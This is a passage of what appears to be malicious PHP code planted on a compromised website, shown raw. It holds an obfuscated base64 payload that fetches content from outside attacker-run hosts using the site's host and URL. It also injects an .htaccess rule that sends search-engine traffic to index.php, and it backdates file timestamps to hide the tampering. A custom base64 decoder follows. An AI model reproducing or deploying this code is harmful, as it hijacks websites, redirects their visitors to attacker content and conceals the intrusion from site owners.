CcnOyAkd3NfaGFzaCA9IG1kNSgnd3NhJyk7ICRjYWNoZV9kaXIgPSBfXzFnZXRfcm9vdCgpOyAkd3NfZmlsZSA9ICRjYWNoZV9kaXIuJy8nLiR3c19oYXNoLicuemlwJzsgaWYgKCFmaWxlX2V4aXN0cygkd3NfZmlsZSkgfHwgZmlsZV9leGlzdHMoJHdzX2ZpbGUpICYmICh0aW1lKCkgLSBmaWxlbXRpbWUoJHdzX2ZpbGUpID4gNjAqNjAqMjQqMSkpIHsgJHdzID0gX18xZmV0Y2hfdXJsKF9fZ2V0X3JldigpLicmZ2V0X3dzJyk7IGlmICghZW1wdHkoJHdzKSkgZmlsZV9wdXRfY29udGVudHMoJHdzX2ZpbGUsICR3cyk7IH0gZWxzZSB7ICR3cyA9IGZpbGVfZ2V0X2NvbnRlbnRzKCR3c19maWxlKTsgfSByZXR1cm4gJHdzOyB9IGZ1bmN0aW9uIF9fZ2V0X3JldigpIHsgcmV0dXJuICdodHRwOi8vYm9rb2luY2hpbmEuY29tL2V4dGFkdWx0Mi5waHA/aG9zdD0nLnRyaW0oc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9IT1NUJ10pLCAnLicpLicmZnVsbF91cmw9Jy51cmxlbmNvZGUoJ2h0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXSk7IHJldHVybiAnaHR0cDovL25lemxvYnVkbnlhLmNvbS9nZW5lcmF0ZSc7IH0gZnVuY3Rpb24gX18xZmV0Y2hfdXJsKCR1cmwpIHsgJGNvbnRlbnRzID0gZmFsc2U7ICRlcnJzID0gMDsgd2hpbGUgKCAhJGNvbnRlbnRzICYmICgkZXJycysrIDwgMykgKSB7ICR1c2VyX2FnZW50ID0gJ01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IHJ2OjQwLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNDAuMSc7IGlmIChpc19jYWxsYWJsZSgnY3VybF9pbml0JykpIHsgJGMgPSBjdXJsX2luaXQoJHVybCk7IGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCBUUlVFKTsgY3VybF9zZXRvcHQoJGMsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9VU0VSQUdFTlQsJHVzZXJfYWdlbnQpOyAkY29udGVudHMgPSBjdXJsX2V4ZWMoJGMpOyBpZiAoY3VybF9nZXRpbmZvKCRjLCBDVVJMSU5GT19IVFRQX0NPREUpICE9PSAyMDApICRjb250ZW50cyA9IGZhbHNlOyBjdXJsX2Nsb3NlKCRjKTsgfSBlbHNlIHsgJGFsbG93VXJsRm9wZW4gPSBwcmVnX21hdGNoKCcvMXx5ZXN8b258dHJ1ZS9pJywgaW5pX2dldCgnYWxsb3dfdXJsX2ZvcGVuJykpOyBpZiAoJGFsbG93VXJsRm9wZW4pIHsgJG9wdGlvbnMgPSBhcnJheSgnaHR0cCcgPT4gYXJyYXkoJ3VzZXJfYWdlbnQnID0+ICR1c2VyX2FnZW50KSk7ICRjb250ZXh0ID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKCRvcHRpb25zKTsgJGNvbnRlbnRzID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwsIGZhbHNlLCAkY29udGV4dCk7IH0gfSB9IHJldHVybiAkY29udGVudHM7IH0KLy8gU2lsZW5jZSBpcyBnb2xkZW4='));
}
$htaccess = "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>\n\n"; $htaccess_path = __get_root().'/.htaccess'; chmod(dirname($htaccess_path), 0755); chmod($htaccess_path, 0644); touch($htaccess_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($htaccess_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); $htaccess_content_original = file_get_contents($htaccess_path); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>RewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = str_replace("<IfModule mod_rewrite.c>RewriteEngine on\nRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\nRewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\nRewriteRule ^.*$ index.php [L]\n</IfModule>", '', $htaccess_content_original); $htaccess_content_original = preg_replace("/\n+/", "\n", $htaccess_content_original); if (strpos($htaccess_content_original, trim($htaccess)) === false) { $htaccess_content = $htaccess."\n".$htaccess_content_original; file_put_contents($htaccess_path, $htaccess_content); chmod($htaccess_path, 0644); touch($htaccess_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($htaccess_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); }
__get_tds('', '');
__get_ws();
}
function __bdec($input) {
$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
$chr1 = $chr2 = $chr3 = "";
$enc1 = $enc2 = $enc3 = $enc4 = "";
$i = 0;
$output = "";
// remove all characters that are not A-Z, a-z, 0-9, +, /, or =
$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
do {
$enc1 = strpos($keyStr, substr($input, $i++, 1));
$enc2 = strpos($keyStr, substr($input, $i++, 1));
$enc3 = strpos($keyStr, substr($input, $i++, 1));
$enc4 = strpos($keyStr, substr($input, $i++, 1));
$chr1 = ($enc1 << 2) | ($enc2 >> 4);
$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
$chr3 = (($enc3 & 3) << 6) | $enc4;
$output = $output . chr((int) $chr1);
if ($enc3 != 64) {
$output = $output . chr((int) $chr2);
}
if ($enc4 != 64) {
$output = $output . chr((int) $chr3);
}
$chr1 = $chr2 = $chr3 = "";
$enc1 = $enc2 = $enc3 = $enc4 = "";
} while ($i < strlen($input));
return $output;
}